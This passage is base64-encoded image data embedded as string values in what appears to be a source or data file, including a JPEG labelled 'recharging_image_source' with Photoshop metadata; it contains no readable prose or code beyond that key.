F9/fHueSu+Mu8IN+bAWZ55eiu2s1Xzx0EDSPK9NsTsKo+/y2FjjVyIqStWrpgAscZgQC3uvdBR3R3P1T8jeus90d3jhd1/GDt95aHI7ErOyqBMdTYDsPDV0eR2juTZnYGPeu2jlauhzFFFMscNa0pj9MsYDFT7r3Qs/B/NfI3PDtOp743dit3UmMz2JwO1a/A0cVNt2aTH4mBs1U7bmH+VV+GapnWITz2eaohlkVURkRfde6Pz7917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuv/9ff49+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691ByYyRoKoYd6JMmYiKJ8kk8lCs1xY1KUzxztGFvwpBv7917ooXZXSHfm8/JuKl7noKPO4ulkfA7QpNuQwbLqK5ZLw/xSSqlqa6eJ4mIfWrAm3Fh7917on26Pjp8+N9Zf8AgFRuHY+N23RRU5i3Fnd65mhxr1JXyTSYPY2xKUQ0iwTn0/dMbm5tz7917qsHfHxk/mtbQ7K7PyPSuBx+O3JuFqvbuQ7ZwWzcZNlNxUJjp6Zc3T5Df0mQNbLPSUcEbSXp2kjp4kb0Roo917pD5zbH897pnrCpjbI09RjsY0MtRvrcOE6ho92yTVJ0vF95tTG5XOQQoxOgRIxH0uPfuvdEG7X7N/naZmXF4TMdjfL+po8tBLI7dT4jc9dhit9AWbJUseLkDf6lQnCm/v3Xui152L+Zf0vNQ1u4d/8AzW2y28DJHOu5V7IxVZnnp2RpoKUtVMZlHkAcrYgML/g+/de6xTbd/madj1ER27sf5h72hdopEyI/0p1siSqymIxGsqYILfQi7WB/2F/de6N91v8ADf8Amh9kmep3zs/+YPhdwZWGDCRZSs3FjKDb0FFLGsEU1dR7q3bQyNjaXUGlTxuSqkKb+/de62zf5c/x772+M3Tb9Yd07pxu82oKmKrwmfWqqajOzmpRnrYMojVNVRU8FO9hCsTcC9+eT7r3VhPv3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de6//0N/j37r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3USooKGreKSroqSqkgOqB6imhmeFv9VE0iM0Z/xFvfuvdSwLcDgDgAfj37r3Xvfuvde9+691737r3Xvfuvde9+691737r3Rdvlx2buXpj4yd59r7Oippt09e9bbm3XgYq2B6mkkyWHoJKumSpp45IZJoC6epQ6kj8j6+/de6kb7+Q3XvSfx2rfkX3Hnv7v9f7V2Njt47wz1NQV2V+yoZqSlkmnp8djIKqvrWeaoASOGN3YsAAffuvdIzsn5abU66338W8BPh6vL7K+U2er9qbT7CoqiJcXidxvtOp3jtajyNLKqymm3Ti8dUpDKCNE6ohBLi3uvdCFXfJLo6mz24Nm0nZ+yMpv3bm3czueu2JQbkxk26v4VghOtfOMQk71gihqKdonbQQjgg/Q+/de6Ih8s/nHgKT4e9a9s7B3pjdib17c3F0tkdo7ZrM3i33VUbf3NvbbY3DBDQEiarjg27Vzmd1iCrEGY2APv3Xuj21PyK6fxW78L1nPvfG5HsTJQY1jtPCifN5uijr0tT1uYpcZFUHEUMro371R4oxYkkAe/de6Cjs/b+L6u7h3l8s9+dnbmqtp7B6TnpMR1HjsnVpjcZDhqrJ5Xee74tuU1XHDuHK5WkmpIVeaGQ0ophoZfI3v3Xugwwv8zTonOdp4/YFNh95x7SykW56PH9zTUFGnWdduzZm2G3hunZtDkmrBXVmXwmEhlaoljgakjngkhMolRlHuvdSJ/wCYrsujyPWGTyXT/beG6g7Wze39u7f7wzVFtzG7Kgy276yXHbThr8dPnf71xU+4Mh4IYZhQmIPVRayo1lPde6sQVldVdGDI6hlYG4ZWF1YH8gg+/de65e/de697917r3v3Xuv/R3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3SI7K2Pi+y+vt69fZqJZsTvPbGZ23XxuLo1Nl6Cajk1C4uB5b/AFH09+691Snu3a3yG716C2J/Ll3v05vejrqLN7V2Z3L3Lkaal/0b5fpfYWTo56jceFzAqJP4jl+wcdjIqaPHqv3FJJUSNKoSMM3uvdKvrj4T/LeTfXxe6e7YyXXNd8Yfhh2BV9hdc9iY/cWVyPZ/Z1Nh9uZLbXWWz91bYqMNTUOAfatNm5JK2ujrqg1bUFPoUeaVY/de6HHZ/wDLO27gO7Z+yszv583tPE5PtXPbI2vFtvH43cONzXcCZWLczbm3jTt95ufGYyDM1EWNpnijWnjZfIZWRWHuvdAx17/KL2dt/wCKncvR+aptsSdtbkxm4do9d9/ymv3HvPH7VoK5cl1ea2ozZmqcMdpyU1LE9BSTfZM1OZY1TyeNPde6wdL/AAe/mB9IYWsyvUHyX6R2XuPfOTrd19h7a7a6Yqu5oqXd2XnarzKbZ7B23u7rPclbtxquRlokycdTUU1KEiJIRffuvdHAw3xV7V3vW0W7/kh2ttfeO+arpPsLpvdNH13s7IbU6/yEO9solRBuHE4HO5/cVfjq6gxtNDDKj1EwnkUuCgsg917oFKv4e/Fj4nfB/Yey/kLu6Wv2f8dcFueobtatjmxuZqtzdgYjNbVz2ajxWONU+Rzu5v71zwU9EoqHnqZ41QPLo9+691Qz2P2/iO6ewfhr8YMBmfl9371bivkN1hJiuvazo9+oaI7H2fkIq2j3bvLI5auwm783iNkSwwVM0n2VLRvFEWl1OUD+691t0Z6g7mXJ7zTaeW2LSbdbYNNSddU2VxuUnyuP7CiXJrPW7lqY6kU1bthkNEI4YUSoVkmLMwZAvuvdB9V4X5b1fX/UVPR746hw/ZNBuTFT92ZGTaWaym3NwbVjpqtcxj9i0n8VpKjB5eoqmgeKepNRGiq6lPUGX3XujOqGCqGN2CgMRxdrcm3Frn37r3XL37r3X//S3+Pfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3XvfuvdJXe2xtn9k7Xy+yd/bbw+7tpZ+mNHmtu56ihyGKyVKWD+GrpJ1aOVA6gi44IBHPv3Xug36n+M3x/6Kmranp/qHYnXlXkVCV9btrBUtDXVaC1o567S9XJGLCyl9IsOPfuvdDl7917r3v3Xuve/de697917r/9k=
""",
"recharging_image_source": """
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RGF0YWJvb2wBAAAAAFBnUHNlbnVtAAAAAFBnUHMAAAAAUGdQQwAAAABMZWZ0VW50RiNSbHQAAAAAAAAAAAAAAABUb3AgVW50RiNSbHQAAAAAAAAAAAAAAABTY2wgVW50RiNQcmNAWQAAAAAAAAAAABBjcm9wV2hlblByaW50aW5nYm9vbAAAAAAOY3JvcFJlY3RCb3R0b21sb25nAAAAAAAAAAxjcm9wUmVjdExlZnRsb25nAAAAAAAAAA1jcm9wUmVjdFJpZ2h0bG9uZwAAAAAAAAALY3JvcFJlY3RUb3Bsb25nAAAAAAA4QklNA+0AAAAAABAASAAAAAEAAgBIAAAAAQACOEJJTQQmAAAAAAAOAAAAAAAAAAAAAD+AAAA4QklNA/IAAAAAAAoAAP///////wAAOEJJTQQNAAAAAAAEAAAAeDhCSU0EGQAAAAAABAAAAB44QklNA/MAAAAAAAkAAAAAAAAAAAEAOEJJTScQAAAAAAAKAAEAAAAAAAAAAjhCSU0D9QAAAAAASAAvZmYAAQBsZmYABgAAAAAAAQAvZmYAAQChmZoABgAAAAAAAQAyAAAAAQBaAAAABgAAAAAAAQA1AAAAAQAtAAAABgAAAAAAAThCSU0D+AAAAAAAcAAA/////////////////////////////wPoAAAAAP////////////////////////////8D6AAAAAD/////////////////////////////A+gAAAAA/////////////////////////////wPoAAA4QklNBAAAAAAAAAIAAzhCSU0EAgAAAAAACAAAAAAAAAAAOEJJTQQwAAAAAAAEAQEBAThCSU0ELQAAAAAABgABAAAADzhCSU0ECAAAAAAAEAAAAAEAAAJAAAACQAAAAAA4QklNBB4AAAAAAAQAAAAAOEJJTQQaAAAAAAM9AAAABgAAAAAAAAAAAAAAoAAAAVQAAAAEAGwAbwBnAG8AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAVQAAACgAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAEAAAAAAABudWxsAAAAAgAAAAZib3VuZHNPYmpjAAAAAQAAAAAAAFJjdDEAAAAEAAAAAFRvcCBsb25nAAAAAAAAAABMZWZ0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ZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS41LWMwMjEgNzkuMTU1NzcyLCAyMDE0LzAxLzEzLTE5OjQ0OjAwICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0RXZ0PSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VFdmVudCMiIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczpwaG90b3Nob3A9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGhvdG9zaG9wLzEuMC8iIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTQgKFdpbmRvd3MpIiB4bXA6Q3JlYXRlRGF0ZT0iMjAxNC0wNy0xNVQwMjo1MDowMSswOTowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAxNC0wNy0xNVQwNDoxMTowOSswOTowMCIgeG1wOk1vZGlmeURhdGU9IjIwMTQtMDctMTVUMDQ6MTE6MDkrMDk6MDAiIGRjOmZvcm1hdD0iaW1hZ2UvanBlZyIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo4Yjk3NmM3ZC0yMWIzLTZhNDAtOTMzNC1mMjdkOTFmY2JlNTIiIHhtcE1NOkRvY3VtZW50SUQ9ImFkb2JlOmRvY2lkOnBob3Rvc2hvcDo5NzQ0Yzc0ZS0wYjhhLTExZTQtYWNmYy04ZTIyOGM5NDhiMGMiIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0ieG1wLmRpZDo4YTczMmUwOS1iZGRjLTY1NDQtOTM0NS0zMjgyYmFhMTkyOTYiIHBob3Rvc2hvcDpDb2xvck1vZGU9IjMiIHBob3Rvc2hvcDpJQ0NQcm9maWxlPSJzUkdCIElFQzYxOTY2LTIuMSI+IDx4bXBNTTpIaXN0b3J5PiA8cmRmOlNlcT4gPHJkZjpsaSBzdEV2dDphY3Rpb249ImNyZWF0ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6OGE3MzJlMDktYmRkYy02NTQ0LTkzNDUtMzI4MmJhYTE5Mjk2IiBzdEV2dDp3aGVuPSIyMDE0LTA3LTE1VDAyOjUwO